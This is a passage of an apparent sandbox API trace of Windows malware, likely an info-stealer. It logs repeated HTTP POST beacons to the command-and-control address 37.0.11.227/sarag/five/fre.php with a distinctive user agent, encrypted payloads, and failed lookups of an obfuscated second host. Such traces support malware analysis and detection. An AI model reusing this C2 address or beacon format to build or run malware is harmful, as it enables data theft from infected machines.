[0277.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0277.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.848] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0277.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.848] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0277.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.849] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0277.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0277.850] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0277.850] GetProcessHeap () returned 0x690000 [0277.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0277.850] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0277.850] GetProcessHeap () returned 0x690000 [0277.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0277.850] socket (af=2, type=1, protocol=6) returned 0x88c [0277.851] connect (s=0x88c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0277.875] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0277.875] GetProcessHeap () returned 0x690000 [0277.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0277.875] GetProcessHeap () returned 0x690000 [0277.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0277.879] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.879] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0277.879] GetProcessHeap () returned 0x690000 [0277.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0277.880] GetProcessHeap () returned 0x690000 [0277.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.880] GetProcessHeap () returned 0x690000 [0277.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0277.880] GetProcessHeap () returned 0x690000 [0277.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0277.881] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0277.882] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0277.882] GetProcessHeap () returned 0x690000 [0277.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0277.882] GetProcessHeap () returned 0x690000 [0277.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0277.882] send (s=0x88c, buf=0x6ad508*, len=242, flags=0) returned 242 [0277.883] send (s=0x88c, buf=0x6aba40*, len=159, flags=0) returned 159 [0277.883] GetProcessHeap () returned 0x690000 [0277.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0277.883] recv (in: s=0x88c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0277.956] GetProcessHeap () returned 0x690000 [0277.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0277.957] GetProcessHeap () returned 0x690000 [0277.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0277.957] GetProcessHeap () returned 0x690000 [0277.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0277.957] GetProcessHeap () returned 0x690000 [0277.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0277.958] closesocket (s=0x88c) returned 0 [0277.958] GetProcessHeap () returned 0x690000 [0277.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0277.958] GetProcessHeap () returned 0x690000 [0277.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0277.959] GetProcessHeap () returned 0x690000 [0277.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0277.959] GetProcessHeap () returned 0x690000 [0277.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0277.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x164c) returned 0x88c [0277.961] Sleep (dwMilliseconds=0xea60) [0277.962] GetProcessHeap () returned 0x690000 [0277.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0277.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0277.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0278.012] GetProcessHeap () returned 0x690000 [0278.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0278.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.014] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.015] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.016] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.016] GetProcessHeap () returned 0x690000 [0278.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0278.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.017] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0278.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.018] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.019] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0278.019] GetProcessHeap () returned 0x690000 [0278.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.020] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.022] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.023] GetProcessHeap () returned 0x690000 [0278.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0278.023] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.023] GetProcessHeap () returned 0x690000 [0278.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0278.024] GetProcessHeap () returned 0x690000 [0278.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.024] GetProcessHeap () returned 0x690000 [0278.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0278.024] GetProcessHeap () returned 0x690000 [0278.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0278.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0278.038] GetProcessHeap () returned 0x690000 [0278.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0278.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.038] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.039] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.040] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.040] GetProcessHeap () returned 0x690000 [0278.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0278.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.044] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0278.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.045] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.046] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0278.046] GetProcessHeap () returned 0x690000 [0278.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.047] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0278.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.048] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0278.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.048] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0278.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0278.049] GetProcessHeap () returned 0x690000 [0278.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0278.049] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0278.049] GetProcessHeap () returned 0x690000 [0278.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0278.049] socket (af=2, type=1, protocol=6) returned 0x890 [0278.050] connect (s=0x890, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0278.077] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0278.077] GetProcessHeap () returned 0x690000 [0278.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0278.077] GetProcessHeap () returned 0x690000 [0278.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0278.079] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.080] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.080] GetProcessHeap () returned 0x690000 [0278.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0278.080] GetProcessHeap () returned 0x690000 [0278.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.081] GetProcessHeap () returned 0x690000 [0278.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0278.081] GetProcessHeap () returned 0x690000 [0278.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0278.083] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.088] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.089] GetProcessHeap () returned 0x690000 [0278.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0278.089] GetProcessHeap () returned 0x690000 [0278.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.089] send (s=0x890, buf=0x6ad508*, len=242, flags=0) returned 242 [0278.090] send (s=0x890, buf=0x6aba40*, len=159, flags=0) returned 159 [0278.090] GetProcessHeap () returned 0x690000 [0278.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0278.090] recv (in: s=0x890, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0278.165] GetProcessHeap () returned 0x690000 [0278.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0278.166] GetProcessHeap () returned 0x690000 [0278.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0278.167] GetProcessHeap () returned 0x690000 [0278.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0278.168] GetProcessHeap () returned 0x690000 [0278.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0278.169] closesocket (s=0x890) returned 0 [0278.169] GetProcessHeap () returned 0x690000 [0278.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0278.169] GetProcessHeap () returned 0x690000 [0278.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.169] GetProcessHeap () returned 0x690000 [0278.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0278.170] GetProcessHeap () returned 0x690000 [0278.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0278.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1650) returned 0x890 [0278.171] Sleep (dwMilliseconds=0xea60) [0278.173] GetProcessHeap () returned 0x690000 [0278.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0278.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.174] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0278.188] GetProcessHeap () returned 0x690000 [0278.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0278.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.236] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.237] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.238] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.238] GetProcessHeap () returned 0x690000 [0278.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0278.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.242] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0278.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.242] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.243] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0278.243] GetProcessHeap () returned 0x690000 [0278.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0278.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.244] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.245] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.247] GetProcessHeap () returned 0x690000 [0278.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0278.247] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.247] GetProcessHeap () returned 0x690000 [0278.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0278.248] GetProcessHeap () returned 0x690000 [0278.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0278.248] GetProcessHeap () returned 0x690000 [0278.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0278.249] GetProcessHeap () returned 0x690000 [0278.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0278.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0278.266] GetProcessHeap () returned 0x690000 [0278.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0278.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.267] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.268] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.269] GetProcessHeap () returned 0x690000 [0278.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0278.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.270] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0278.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.273] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.274] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0278.274] GetProcessHeap () returned 0x690000 [0278.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.274] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0278.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0278.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.276] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0278.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.277] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0278.277] GetProcessHeap () returned 0x690000 [0278.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0278.277] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, 